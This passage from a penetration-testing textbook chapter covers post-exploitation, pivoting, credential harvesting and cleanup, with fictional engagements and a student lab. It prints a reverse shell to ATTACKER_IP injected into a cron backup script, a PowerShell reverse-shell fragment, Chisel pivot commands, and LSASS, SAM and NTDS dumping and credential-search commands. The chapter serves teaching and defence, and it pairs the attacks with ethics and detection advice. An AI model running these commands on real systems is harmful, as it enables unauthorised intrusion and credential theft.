ls -la /opt/scripts/backup.sh
# -rwxrwxrwx 1 root root 1204 Jan 15 08:00 /opt/scripts/backup.sh
# Inject a reverse shell into the backup script
echo 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1' >> /opt/scripts/backup.sh
Phase 4: Pivoting
With root access, the tester sets up a pivot to reach the internal network:
# Upload Chisel to the compromised host
# On attacker machine: ./chisel server --reverse --port 8443 --socks5
# On target:
./chisel client ATTACKER_IP:8443 R:socks
# The tester can now scan the internal network
proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389 172.16.5.0/24
Phase 5: Lateral Movement
Using the database credentials discovered in Phase 2, the tester accesses the internal database server and discovers additional credentials:
# Connect to the internal database through the pivot
proxychains mysql -h 172.16.5.200 -u portal_svc -p'M3dS3cur3!DB'
# Discover additional service account credentials in the database
# These credentials provide access to the Active Directory domain
Phase 6: Objective Achievement
The tester demonstrates access to synthetic patient record data, documenting the complete attack chain from external web application vulnerability to internal database access. The report highlights that network segmentation between the DMZ and internal network was ineffective because the web server maintained persistent database connectivity without adequate access controls.
24.8 Cleaning Up Responsibly
The cleanup phase is a critical professional obligation. Every artifact introduced during testing must be removed, and every change must be reversed. Failure to clean up properly can leave the client's environment less secure than before the test.
24.8.1 Cleanup Checklist
A thorough cleanup process addresses:
- Persistence mechanisms: Remove all backdoors, scheduled tasks, registry entries, SSH keys, services, and implants
- Tools and binaries: Delete all uploaded tools (Chisel, Ligolo, LinPEAS, etc.)
- Staged data: Securely delete any staged or exfiltrated data
- Log artifacts: While testers should not delete security logs (this would itself be suspicious and potentially violate the engagement agreement), they should document which log entries relate to testing activities
- Configuration changes: Revert any modified configurations (firewall rules, service accounts, group memberships)
- Credential changes: If any passwords were changed during testing, coordinate with the client to reset them
- Network changes: Remove any port forwards, routes, or tunnel configurations
24.8.2 Documentation for Cleanup
Professional testers maintain a real-time log of all changes made to the environment:
## Engagement Cleanup Log
### Host: 10.10.10.50 (Patient Portal)
- [x] Removed SSH key from /root/.ssh/authorized_keys
- [x] Removed cron persistence entry
- [x] Deleted /tmp/chisel binary
- [x] Deleted /tmp/.staging/ directory and contents
- [x] Removed injected line from /opt/scripts/backup.sh
- [x] Deleted /opt/.update/ directory
### Host: 172.16.5.200 (Database Server)
- [x] No persistent changes made
- [x] Client notified about portal_svc credential exposure
24.8.3 Client Communication
The tester communicates with the client's security team throughout the cleanup process:
- Provide a complete list of all modifications made
- Coordinate timing for cleanup to minimize disruption
- Verify cleanup completion with the client's team
- Offer to assist with any remediation of discovered issues
- Provide the client with IOCs (Indicators of Compromise) related to the testing activity so they can verify their detection capabilities
24.9 Post-Exploitation Reporting: Telling the Attack Story
The ultimate purpose of post-exploitation is to produce a compelling report that communicates risk to stakeholders. The difference between a mediocre penetration test report and an excellent one often lies in how the post-exploitation narrative is constructed.
24.9.1 The Attack Narrative Structure
A well-structured post-exploitation narrative follows the attack chain from initial access to objective achievement, making the risk tangible for both technical and non-technical audiences:
- Initial Vulnerability: What was the entry point? (e.g., "A Java deserialization vulnerability in the patient portal allowed remote code execution as the tomcat service account")
- Escalation Path: How did access expand? Include each privilege escalation and pivot with specific evidence
- Lateral Movement: How did the attacker reach critical systems? Document each hop with timestamps and methods
- Impact Demonstration: What was ultimately accessed? Document evidence without exposing actual sensitive data
- Business Risk Translation: Convert technical findings into business language ("An attacker with the skills demonstrated could access approximately 2.3 million patient records, triggering mandatory HIPAA breach notification requirements and potential regulatory fines")
24.9.2 Evidence Collection During Post-Exploitation
Throughout post-exploitation, collect evidence that supports the narrative:
- Screenshots: Capture directory listings, system prompts, tool output, and network diagrams. Never screenshot actual sensitive data.
- Command logs: Maintain a complete log of every command executed on every compromised host, with timestamps.
- Network diagrams: Create diagrams showing the attack path through the network, including all pivot points and lateral movement hops.
- Credential evidence: Document where credentials were found and how they were used, without including the actual credential values in screenshots that might be shared widely.
- Timeline: Construct a detailed timeline of the engagement from initial access through cleanup.
24.9.3 Risk Rating Post-Exploitation Findings
Post-exploitation findings should be rated based on the combined risk of the attack chain, not just individual vulnerabilities:
- A "Medium" SQL injection that enables access to a database containing hardcoded domain admin credentials becomes a "Critical" finding when the full chain is documented
- A "Low" information disclosure vulnerability that reveals internal network architecture becomes "High" when combined with a pivot path to critical systems
- Network segmentation failures that are invisible to vulnerability scanners become obvious through post-exploitation testing
This chain-based risk assessment is one of the primary values that penetration testing provides over automated vulnerability scanning.
24.10 Post-Exploitation in the ShopStack and Student Lab Environments
ShopStack E-Commerce Platform
In the ShopStack scenario, post-exploitation focuses on the e-commerce application's payment processing infrastructure. After compromising the application server, testers pivot to the payment processing segment to determine whether cardholder data environment (CDE) segmentation is effective. Key objectives include testing PCI DSS segmentation controls and demonstrating whether an attacker could reach payment card data from a compromised web frontend.
Student Home Lab
For the home lab, students can practice post-exploitation and pivoting using a multi-VM environment:
- Kali Linux (attacker): 192.168.1.100
- Metasploitable 2 (initial target): 192.168.1.200, also connected to 10.0.0.0/24
- Internal Ubuntu (pivot target): 10.0.0.50
Students exploit Metasploitable 2, establish a pivot through it, and access the internal Ubuntu VM. This simple three-machine setup teaches the fundamental concepts of pivoting without requiring expensive infrastructure.
# Student lab: Basic SSH pivot exercise
# 1. Exploit Metasploitable 2 and obtain SSH credentials
# 2. Create a SOCKS proxy through Metasploitable
ssh -D 1080 user@192.168.1.200
# 3. Scan the internal network through the pivot
proxychains nmap -sT -Pn 10.0.0.0/24
# 4. Access the internal Ubuntu VM
proxychains ssh user@10.0.0.50
24.11 Anti-Forensics and Operational Security
While ethical hackers must document their activities transparently, understanding anti-forensics techniques is essential for two reasons: first, to simulate sophisticated adversaries who employ these techniques, and second, to help blue teams understand what indicators to look for when investigating real breaches.
24.11.1 Timestomping
Timestomping is the modification of file timestamps (creation time, modification time, access time) to make malicious files appear as if they have been present on the system longer than they actually have. On Windows, tools like Timestomp (part of Meterpreter) and PowerShell can modify all four NTFS timestamps. On Linux, the touch command can modify modification and access times.
Defenders can detect timestomping by comparing NTFS $STANDARD_INFORMATION timestamps with $FILE_NAME timestamps in the Master File Table (MFT), as the latter are harder to modify. Inconsistencies between these two sets of timestamps indicate tampering.
24.11.2 Log Manipulation
Sophisticated attackers may attempt to cover their tracks by manipulating system logs:
- Selective deletion: Removing specific log entries related to the attack while leaving the rest intact (more subtle than clearing entire logs)
- Log flooding: Generating large volumes of benign log entries to make forensic analysis more difficult
- Timestamp manipulation: Modifying log timestamps to confuse incident timeline reconstruction
- Log forwarding disruption: Disabling or redirecting syslog forwarding to prevent centralized log collection
Important
: During authorized penetration tests, testers should NEVER delete, modify, or tamper with security logs. This would violate the engagement agreement, potentially break laws regarding evidence tampering, and deprive the client of valuable data about detection capabilities. Instead, testers should document what log entries their activities generated so the client can evaluate their monitoring effectiveness.
24.11.3 Indicator of Compromise (IOC) Awareness
Professional penetration testers should be aware of the IOCs their activities generate and document them for the client:
- Network IOCs: Unusual connections, beaconing patterns, large data transfers, DNS queries to unusual domains
- Host IOCs: New files, modified registry keys, new scheduled tasks, unusual processes, new user accounts
- Authentication IOCs: Failed login attempts, successful logins at unusual times, privilege escalation events, Kerberos ticket anomalies
- Log IOCs: Specific Windows Event IDs (4624, 4625, 4672, 4688, 4768, 4769, 7045, etc.) and syslog entries
Providing the client with a list of IOCs generated during testing enables them to evaluate their detection capabilities: which IOCs were detected and alerted on, which were logged but not alerted on, and which were missed entirely. This gap analysis is often the most valuable part of the post-exploitation report.
24.12 Credential Harvesting Deep Dive
Credential harvesting is the engine that drives post-exploitation. Without credentials, lateral movement stalls. Understanding the full landscape of credential storage locations and extraction techniques is essential for effective post-exploitation.
24.12.1 Windows Credential Storage
Windows stores credentials in multiple locations, each requiring different techniques for extraction:
SAM Database: The Security Account Manager database (C:\Windows\System32\config\SAM) stores local account password hashes. It is locked while Windows is running, but hashes can be extracted from memory or by booting from alternative media.
# Extract SAM hashes with Impacket's secretsdump
python3 secretsdump.py ./Administrator:Password@TARGET_IP
# Extract SAM hashes with CrackMapExec
crackmapexec smb TARGET_IP -u Administrator -p Password --sam
# Extract from memory with Mimikatz
sekurlsa::logonpasswords
LSASS Process Memory: The Local Security Authority Subsystem Service (lsass.exe) process holds credentials for recently authenticated users in memory. This includes NTLM hashes, Kerberos tickets, and in some configurations, plaintext passwords.
# Dump LSASS with procdump (Sysinternals - signed binary)
procdump.exe -ma lsass.exe lsass.dmp
# Dump LSASS with comsvcs.dll (LOLBin technique)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full
# Parse the dump offline with Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Windows Credential Manager: Stores web credentials, Windows credentials, and certificate-based credentials. Can be accessed through the Credential Manager GUI or programmatically.
DPAPI (Data Protection API): Windows uses DPAPI to protect various credentials, including Chrome browser passwords, Windows Vault credentials, and RDP connection credentials. DPAPI-encrypted blobs can be decrypted with the user's master key, which is derived from their password.
Group Policy Preferences (GPP): Legacy Group Policy Preferences stored in SYSVOL may contain AES-encrypted passwords. The encryption key was published by Microsoft, making decryption trivial.
# Find and decrypt GPP passwords
python3 gpp-decrypt.py "ENCRYPTED_PASSWORD_STRING"
# CrackMapExec module for GPP
crackmapexec smb DC_IP -u user -p password -M gpp_password
NTDS.dit: The Active Directory database stored on Domain Controllers contains password hashes for all domain accounts. Extraction requires Domain Admin or equivalent privileges.
# Extract NTDS.dit with secretsdump (DCSync attack)
python3 secretsdump.py domain/admin:password@DC_IP -just-dc-ntlm
# Or using the Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
24.12.2 Linux Credential Storage
Linux credential storage is more straightforward but equally rich:
Shadow File: /etc/shadow contains password hashes for local accounts. Requires root access to read.
SSH Keys: Private keys stored in user home directories (~/.ssh/id_rsa, ~/.ssh/id_ed25519) provide passwordless authentication to other systems. Searching all user home directories for SSH keys is a standard post-exploitation task.
Configuration Files: Application configuration files frequently contain credentials in plaintext or base64 encoding:
# Search for potential credentials in common locations
grep -r "password" /etc/ --include="*.conf" --include="*.yml" --include="*.ini" 2>/dev/null
grep -r "password" /opt/ --include="*.properties" --include="*.xml" 2>/dev/null
grep -r "api_key\|api_secret\|token" /var/www/ 2>/dev/null
# Check bash history for credential leakage
cat /home/*/.bash_history 2>/dev/null | grep -i "pass\|key\|token\|secret"
# Check environment variables
env | grep -i "pass\|key\|token\|secret"
Browser Credentials: Firefox stores credentials in logins.json (encrypted with a key in key4.db). Chrome on Linux stores credentials in ~/.config/google-chrome/Default/Login Data (SQLite database, encrypted with the user's keyring).
Keyring and Secret Storage: GNOME Keyring and KDE Wallet store application passwords. These can be accessed if the user's session is compromised.
24.12.3 Cloud Credential Harvesting
Cloud environments introduce new credential targets:
- AWS credentials file:
~/.aws/credentialscontains access key IDs and secret access keys - Azure CLI tokens:
~/.azure/directory contains authentication tokens - GCP credentials:
~/.config/gcloud/credentials.dband application default credentials - Docker configuration:
~/.docker/config.jsonmay contain registry authentication tokens - Kubernetes configurations:
~/.kube/configcontains cluster authentication details
# Search for cloud credentials
find / -name "credentials" -path "*/.aws/*" 2>/dev/null
find / -name "config.json" -path "*/.docker/*" 2>/dev/null
find / -name "*.kubeconfig" 2>/dev/null
# Check environment variables for cloud credentials
env | grep -i "AWS_\|AZURE_\|GOOGLE_\|GCP_"
Blue Team Perspective: Protect credentials with a layered approach: implement Credential Guard on Windows to protect LSASS memory, deploy LAPS for unique local administrator passwords, use managed identity and service principals instead of stored credentials for cloud access, implement secrets management solutions (HashiCorp Vault, AWS Secrets Manager, Azure Key Vault), regularly scan for hardcoded credentials in code and configuration files, and monitor for credential dumping activities (Event IDs 4624, 4625, 4648 for Windows; audit log entries for sudo, su, and SSH key usage on Linux).
24.13 Ethical and Legal Considerations
Post-exploitation carries the highest risk of any penetration testing phase. The ethical hacker is operating inside a production environment with potentially elevated privileges. Mistakes can cause data loss, service disruption, or exposure of sensitive information.
Key Principles
- Scope adherence: Never access systems or data outside the authorized scope, even if technically possible
- Data handling: Never access, copy, or store real sensitive data (PII, PHI, financial records). Use screenshots of directory listings or record counts to demonstrate access without handling actual data
- System stability: Avoid actions that could crash production systems. Prefer stealthy, low-impact techniques over aggressive exploitation
- Real-time communication: Maintain open communication with the client's point of contact. Report critical findings immediately rather than waiting for the final report
- Legal compliance: Ensure all activities comply with applicable laws and regulations. Post-exploitation activities that exceed the scope of authorization may constitute criminal computer access, regardless of intent
The "Crown Jewels" Dilemma
When a penetration test achieves access to the organization's most sensitive data -- patient records at MedSecure, cardholder data at ShopStack -- the tester faces an ethical decision. The goal is to demonstrate that access is possible, not to actually browse or collect sensitive data. Professional testers:
- Document the path taken to reach the sensitive system
- Record evidence of access (screenshots of database tables showing column headers, record counts) without viewing actual data content
- Immediately notify the client of critical findings
- Include specific remediation recommendations in the report
24.14 The Penetration Test Kill Chain: Post-Exploitation in Context
Understanding where post-exploitation fits within the broader penetration testing methodology helps testers plan their engagements more effectively and communicate findings to stakeholders with appropriate context.
24.14.1 From Exploitation to Post-Exploitation
The transition from exploitation to post-exploitation is not always a clean boundary. When an exploit delivers a shell, the tester must immediately assess the situation before proceeding:
Shell Assessment Checklist: 1. What type of shell do I have? A bind shell, reverse shell, web shell, or interactive session each has different capabilities and limitations 2. What privilege level? Running as root/SYSTEM versus an unprivileged user fundamentally changes the available post-exploitation paths 3. What operating system and version? Determines which tools, techniques, and persistence mechanisms apply 4. Is there network connectivity? Can the compromised host reach other internal networks, or is it isolated? 5. What security controls are present? Antivirus, EDR, application whitelisting, and logging configurations all influence technique selection
24.14.2 Shell Upgrading and Stabilization
Raw reverse shells are fragile and limited. Professional testers stabilize their access before proceeding with post-exploitation:
# Python PTY upgrade (Linux)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background the shell and configure terminal
# Press Ctrl-Z
stty raw -echo; fg
# Set terminal environment variables
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 50 columns 120
On Windows, upgrading from a basic cmd.exe shell to PowerShell (or a Meterpreter/C2 agent) provides significantly more capability. The ConPTY (Console Pseudo Terminal) technique enables full interactive terminal access over reverse shells:
# PowerShell reverse shell upgrade
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", 4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("PS " + (pwd).Path + "> ")
$stream.Write($sendbytes,0,$sendbytes.Length)
24.14.3 Common Post-Exploitation Mistakes
Even experienced testers make mistakes during post-exploitation. Understanding common pitfalls helps avoid them:
Running noisy tools too early: Executing a full Nmap scan or BloodHound collector before understanding the environment may trigger alerts and burn the access. Start with passive reconnaissance -- reading files, examining network connections, and understanding the environment -- before running active tools.
Neglecting to check for EDR: Modern Endpoint Detection and Response solutions will detect and block many common post-exploitation tools. Before uploading Mimikatz or running SharpHound, identify what security products are installed and select appropriate evasion techniques.
# Check for common EDR/AV products on Windows
Get-Process | Where-Object {
$_.ProcessName -match "MsMpEng|CrowdStrike|Cortex|Sentinel|Carbon|Cylance|Sophos|Symantec|McAfee"
}
Get-Service | Where-Object {
$_.Name -match "WinDefend|CSFalcon|xagt|SentinelAgent|CbDefense|CylanceSvc"
}
Failing to maintain access: Getting a shell, running a few commands, and then losing access because the exploited service crashed or the user logged off wastes valuable time. Establishing persistence early (within the authorized scope) ensures continued access throughout the engagement.
Not documenting as you go: Post-exploitation generates a rapid stream of findings. Testers who plan to "document everything later" inevitably lose critical details. Maintain a running log with timestamps, commands executed, output received, and observations. Tools like Obsidian, CherryTree, or even a simple terminal logger capture this information in real time.
Over-pivoting: Accessing every reachable system is unnecessary and increases risk. Instead, follow the engagement objectives: if the goal is to reach the domain controller, focus on the most direct path rather than compromising every system along the way.
24.14.4 Post-Exploitation Decision Framework
At each stage of post-exploitation, the tester faces decisions that balance thoroughness with risk. The following framework guides these decisions:
| Decision Point | Key Question | Action |
|---|---|---|
| Initial access obtained | Is the shell stable? | Upgrade and stabilize before proceeding |
| Privilege level assessed | Can I escalate? | Attempt escalation only with low-risk methods first |
| Persistence considered | Does the engagement require it? | Establish persistence only if authorized and needed |
| Network assessment | What systems are reachable? | Map adjacent networks passively before active scanning |
| Credential found | Is the target in scope? | Verify scope before using credentials on new systems |
| Sensitive data reached | How do I prove access? | Document without accessing actual content |
| Objective achieved | What next? | Report critical findings, assess remaining objectives |
This decision framework ensures that post-exploitation activities remain focused, controlled, and aligned with engagement objectives at every step. Deviating from this structured approach increases the risk of scope violations, detection, and unintended impact on production systems.
24.14.5 Post-Exploitation Automation and Scripting
Experienced penetration testers develop automation for repetitive post-exploitation tasks. This reduces time on target, minimizes the chance of errors, and ensures consistent data collection across engagements.
Common automation targets include:
Situational awareness scripts: Automated collection of system information, network configuration, installed software, running processes, scheduled tasks, and user accounts. These scripts run the same checks on every compromised host, ensuring nothing is missed.
#!/bin/bash
# Linux situational awareness automation
echo "=== HOSTNAME ==="
hostname && uname -a
echo "=== NETWORK ==="
ip addr show && ip route show && cat /etc/resolv.conf
echo "=== USERS ==="
cat /etc/passwd | grep -v nologin | grep -v false
echo "=== SUDO ==="
sudo -l 2>/dev/null
echo "=== SUID ==="
find / -perm -4000 -type f 2>/dev/null
echo "=== CRON ==="
crontab -l 2>/dev/null && ls -la /etc/cron* 2>/dev/null
echo "=== CONNECTIONS ==="
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null
echo "=== PROCESSES ==="
ps auxf
echo "=== INTERESTING FILES ==="
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.env" 2>/dev/null | head -50
Credential extraction pipelines: Automated credential harvesting that adapts to the operating system and privilege level, running appropriate tools and outputting credentials in a standardized format for subsequent use.
Pivot chain management: Scripts that establish and verify multi-hop tunnel configurations, ensuring that complex pivot chains remain stable throughout extended engagements.
Blue Team Perspective: The automation used by penetration testers mirrors the automation used by real adversaries. Red team automation scripts provide excellent material for detection engineering. Security teams should analyze common post-exploitation automation patterns and build detection rules that identify their behavioral signatures -- rapid sequential process creation, bulk file access patterns, systematic network probing, and credential store access attempts.
24.15 Summary
Post-exploitation and pivoting transform a single vulnerability into a comprehensive security assessment. Through systematic situational awareness, privilege escalation, persistence establishment, lateral movement, and controlled data exfiltration, ethical hackers demonstrate the real-world impact of security weaknesses.
The techniques covered in this chapter -- SSH tunneling, Chisel, Ligolo-ng, Pass-the-Hash, Kerberoasting, and numerous persistence mechanisms -- represent the core toolkit of post-exploitation activities. However, the tools are secondary to the methodology: understanding the target environment, identifying paths to objectives, and executing with precision while maintaining strict adherence to ethical and legal boundaries.
The most valuable penetration tests are those that tell a compelling story -- tracing a path from an initial vulnerability through lateral movement and pivoting to the organization's most critical assets. This narrative approach helps stakeholders understand not just that vulnerabilities exist, but how they combine to create systemic risk that demands immediate remediation.
As we continue through this part of the book, the concepts introduced here will serve as the foundation for more advanced topics. The ability to maintain access, move through networks, and operate effectively in post-exploitation scenarios is what separates surface-level vulnerability scanning from true penetration testing.
Review Questions
-
Explain the difference between pivoting and lateral movement. How do these concepts relate to each other in a penetration test?
-
Why is the post-exploitation phase often more valuable than the initial exploitation phase in demonstrating security risk to an organization?
-
Describe three persistence mechanisms for Linux and three for Windows. For each, explain how a defender might detect the mechanism.
-
Compare and contrast SSH tunneling, Chisel, and Ligolo-ng as pivoting tools. In what scenarios would you choose each?
-
What ethical obligations does a penetration tester have regarding data handling during the post-exploitation phase?
-
Explain how Pass-the-Hash works and why it remains effective in many Windows environments despite being a well-known technique.
-
Describe the cleanup process at the end of a penetration test. What are the consequences of inadequate cleanup?
-
How does lateral movement in cloud environments differ from traditional on-premises lateral movement?
-
In the MedSecure scenario, what specific network segmentation failure enabled the attacker to pivot from the DMZ to the internal database? What remediation would you recommend?
-
Why is maintaining a detailed log of all post-exploitation activities essential for both the tester and the client?